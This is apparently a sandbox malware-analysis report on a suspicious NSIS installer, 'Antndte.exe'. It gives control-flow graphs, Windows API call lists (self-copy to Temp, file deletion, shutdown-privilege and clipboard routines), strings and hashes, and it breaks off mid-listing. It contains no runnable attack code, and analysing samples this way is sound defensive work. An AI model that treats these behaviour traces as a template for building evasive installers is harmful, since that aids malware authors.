                                                                                                                                control_flow_graph 0 403373-4033b0 SetErrorMode GetVersion 1 4033b2-4033ba call 40665c 0->1 2 4033c3 0->2 1->2 8 4033bc 1->8 3 4033c8-4033dc call 4065ec lstrlenA 2->3 9 4033de-4033fa call 40665c * 3 3->9 8->2 16 40340b-40346c #17 OleInitialize SHGetFileInfoW call 406282 GetCommandLineW call 406282 GetModuleHandleW 9->16 17 4033fc-403402 9->17 24 403476-403490 call 405b80 CharNextW 16->24 25 40346e-403475 16->25 17->16 22 403404 17->22 22->16 28 403496-40349c 24->28 29 4035a7-4035c1 GetTempPathW call 403342 24->29 25->24 31 4034a5-4034a9 28->31 32 40349e-4034a3 28->32 36 4035c3-4035e1 GetWindowsDirectoryW lstrcatW call 403342 29->36 37 403619-403633 DeleteFileW call 402ec1 29->37 34 4034b0-4034b4 31->34 35 4034ab-4034af 31->35 32->31 32->32 38 403573-403580 call 405b80 34->38 39 4034ba-4034c0 34->39 35->34 36->37 54 4035e3-403613 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403342 36->54 57 4036e4-4036f4 call 4038b6 OleUninitialize 37->57 58 403639-40363f 37->58 55 403582-403583 38->55 56 403584-40358a 38->56 43 4034c2-4034ca 39->43 44 4034db-403514 39->44 50 4034d1 43->50 51 4034cc-4034cf 43->51 45 403531-40356b 44->45 46 403516-40351b 44->46 45->38 53 40356d-403571 45->53 46->45 52 40351d-403525 46->52 50->44 51->44 51->50 60 403527-40352a 52->60 61 40352c 52->61 53->38 62 403592-4035a0 call 406282 53->62 54->37 54->57 55->56 56->28 64 403590 56->64 75 40381a-403820 57->75 76 4036fa-40370a call 4058e4 ExitProcess 57->76 65 4036d4-4036db call 403990 58->65 66 403645-403650 call 405b80 58->66 60->45 60->61 61->45 70 4035a5 62->70 64->70 74 4036e0 65->74 77 403652-403687 66->77 78 40369e-4036a8 66->78 70->29 74->57 80 403822-403838 GetCurrentProcess OpenProcessToken 75->80 81 40389e-4038a6 75->81 82 403689-40368d 77->82 85 403710-403724 call 40584f lstrcatW 78->85 86 4036aa-4036b8 call 405c5b 78->86 88 40383a-403868 LookupPrivilegeValueW AdjustTokenPrivileges 80->88 89 40386e-40387c call 40665c 80->89 83 4038a8 81->83 84 4038ac-4038b0 ExitProcess 81->84 90 403696-40369a 82->90 91 40368f-403694 82->91 83->84 100 403731-40374b lstrcatW lstrcmpiW 85->100 101 403726-40372c lstrcatW 85->101 86->57 99 4036ba-4036d0 call 406282 * 2 86->99 88->89 102 40388a-403895 ExitWindowsEx 89->102 103 40387e-403888 89->103 90->82 95 40369c 90->95 91->90 91->95 95->78 99->65 100->57 106 40374d-403750 100->106 101->100 102->81 104 403897-403899 call 40140b 102->104 103->102 103->104 104->81 110 403752-403757 call 4057b5 106->110 111 403759 call 405832 106->111 116 40375e-40376c SetCurrentDirectoryW 110->116 111->116 118 403779-4037a2 call 406282 116->118 119 40376e-403774 call 406282 116->119 123 4037a7-4037c3 call 4062a4 DeleteFileW 118->123 119->118 126 403804-40380c 123->126 127 4037c5-4037d5 CopyFileW 123->127 126->123 128 40380e-403815 call 406048 126->128 127->126 129 4037d7-4037f7 call 406048 call 4062a4 call 405867 127->129 128->57 129->126 138 4037f9-403800 CloseHandle 129->138 138->126
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE ref: 00403396
                                                                                                                                • GetVersion.KERNEL32 ref: 0040339C
                                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                                                                                                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00403413
                                                                                                                                • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                                                                                                • GetCommandLineW.KERNEL32(coleoptera Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Antndte.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Antndte.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                                                                                                  • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                                                                                  • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035D5
                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035F1
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                                                                                                • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                                                                                                  • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,coleoptera Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                                                                                • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                                                                                                • ExitProcess.KERNEL32 ref: 0040370A
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040371D
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040372C
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403737
                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Antndte.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                                                                                                • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Antndte.exe,0042AA08,?,?,00000006,00000008,0000000A), ref: 004037CD
                                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                                                                                                • ExitProcess.KERNEL32 ref: 004038B0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                • String ID: "C:\Users\user\Desktop\Antndte.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Undige$C:\Users\user\AppData\Local\Temp\Undige\trivant$C:\Users\user\Desktop$C:\Users\user\Desktop\Antndte.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$coleoptera Setup$~nsu
                                                                                                                                • API String ID: 2488574733-2497349700
                                                                                                                                • Opcode ID: 8740e45e5a2bf030c9a121b0df8fe67dd9143e4620b1d2398d4d9988819c1278
                                                                                                                                • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                                                                                                • Opcode Fuzzy Hash: 8740e45e5a2bf030c9a121b0df8fe67dd9143e4620b1d2398d4d9988819c1278
                                                                                                                                • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405425 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 139 405425-405440 140 405446-40550d GetDlgItem * 3 call 40424c call 404b83 GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 4055cf-4055d6 139->141 164 40552b-40552e 140->164 165 40550f-405529 SendMessageW * 2 140->165 143 405600-40560d 141->143 144 4055d8-4055fa GetDlgItem CreateThread CloseHandle 141->144 146 40562b-405635 143->146 147 40560f-405615 143->147 144->143 150 405637-40563d 146->150 151 40568b-40568f 146->151 148 405650-405659 call 40427e 147->148 149 405617-405626 ShowWindow * 2 call 40424c 147->149 161 40565e-405662 148->161 149->146 154 405665-405675 ShowWindow 150->154 155 40563f-40564b call 4041f0 150->155 151->148 158 405691-405697 151->158 162 405685-405686 call 4041f0 154->162 163 405677-405680 call 4052e6 154->163 155->148 158->148 159 405699-4056ac SendMessageW 158->159 166 4056b2-4056dd CreatePopupMenu call 4062a4 AppendMenuW 159->166 167 4057ae-4057b0 159->167 162->151 163->162 168 405530-40553c SendMessageW 164->168 169 40553e-405555 call 404217 164->169 165->164 176 4056f2-405707 TrackPopupMenu 166->176 177 4056df-4056ef GetWindowRect 166->177 167->161 168->169 178 405557-40556b ShowWindow 169->178 179 40558b-4055ac GetDlgItem SendMessageW 169->179 176->167 180 40570d-405724 176->180 177->176 181 40557a 178->181 182 40556d-405578 ShowWindow 178->182 179->167 183 4055b2-4055ca SendMessageW * 2 179->183 184 405729-405744 SendMessageW 180->184 185 405580-405586 call 40424c 181->185 182->185 183->167 184->184 186 405746-405769 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 40576b-405792 SendMessageW 186->188 188->188 189 405794-4057a8 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->167
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                                                                                                • GetClientRect.USER32(?,?), ref: 004054CF
                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405572
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                                                                                                  • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,?,00404077), ref: 0040425A
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004055FA
                                                                                                                                • ShowWindow.USER32(00000000), ref: 0040561E
                                                                                                                                • ShowWindow.USER32(000103D2,00000008), ref: 00405623
                                                                                                                                • ShowWindow.USER32(00000008), ref: 0040566D
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                                                                                                • CreatePopupMenu.USER32 ref: 004056B2
                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004056E6
                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405747
                                                                                                                                • EmptyClipboard.USER32 ref: 0040574D
                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                                                                                                • CloseClipboard.USER32 ref: 004057A8
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                • String ID: {
                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                • Opcode ID: 5aa7074292dd87b531c2491de8ad5fd061926d6abc47a951f7e0cadf41d1d0e1
                                                                                                                                • Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
                                                                                                                                • Opcode Fuzzy Hash: 5aa7074292dd87b531c2491de8ad5fd061926d6abc47a951f7e0cadf41d1d0e1
                                                                                                                                • Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.10000981678.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001121191.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001192333.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4227406936-0
                                                                                                                                • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                                                                • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                                                                • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405990 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 699 405990-4059b6 call 405c5b 702 4059b8-4059ca DeleteFileW 699->702 703 4059cf-4059d6 699->703 704 405b4c-405b50 702->704 705 4059d8-4059da 703->705 706 4059e9-4059f9 call 406282 703->706 707 4059e0-4059e3 705->707 708 405afa-405aff 705->708 712 405a08-405a09 call 405b9f 706->712 713 4059fb-405a06 lstrcatW 706->713 707->706 707->708 708->704 711 405b01-405b04 708->711 714 405b06-405b0c 711->714 715 405b0e-405b16 call 4065c5 711->715 716 405a0e-405a12 712->716 713->716 714->704 715->704 723 405b18-405b2c call 405b53 call 405948 715->723 719 405a14-405a1c 716->719 720 405a1e-405a24 lstrcatW 716->720 719->720 722 405a29-405a45 lstrlenW FindFirstFileW 719->722 720->722 725 405a4b-405a53 722->725 726 405aef-405af3 722->726 739 405b44-405b47 call 4052e6 723->739 740 405b2e-405b31 723->740 729 405a73-405a87 call 406282 725->729 730 405a55-405a5d 725->730 726->708 728 405af5 726->728 728->708 741 405a89-405a91 729->741 742 405a9e-405aa9 call 405948 729->742 731 405ad2-405ae2 FindNextFileW 730->731 732 405a5f-405a67 730->732 731->725 738 405ae8-405ae9 FindClose 731->738 732->729 735 405a69-405a71 732->735 735->729 735->731 738->726 739->704 740->714 743 405b33-405b42 call 4052e6 call 406048 740->743 741->731 744 405a93-405a9c call 405990 741->744 752 405aca-405acd call 4052e6 742->752 753 405aab-405aae 742->753 743->704 744->731 752->731 756 405ab0-405ac0 call 4052e6 call 406048 753->756 757 405ac2-405ac8 753->757 756->731 757->731
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 004059B9
                                                                                                                                • lstrcatW.KERNEL32(Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,\*.*), ref: 00405A01
                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405A24
                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,?,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 00405A2A
                                                                                                                                • FindFirstFileW.KERNELBASE(Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,?,?,?,0040A014,?,Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,?,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 00405A3A
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                • String ID: "C:\Users\user\Desktop\Antndte.exe"$C:\Users\user\AppData\Local\Temp\$Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban$\*.*
                                                                                                                                • API String ID: 2035342205-3525009409
                                                                                                                                • Opcode ID: 20d73c0903214fa156a9522108816c439984431683c0ecb27828972df29f99d9
                                                                                                                                • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                                                                                                • Opcode Fuzzy Hash: 20d73c0903214fa156a9522108816c439984431683c0ecb27828972df29f99d9
                                                                                                                                • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004065C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420), ref: 004065D0
                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 004065DC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                • String ID: C:\
                                                                                                                                • API String ID: 2295610775-3404278061
                                                                                                                                • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                • Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
                                                                                                                                • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                • Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CoCreateInstance.OLE32(004085E8,?,?,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\Undige\trivant, xrefs: 004021BD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
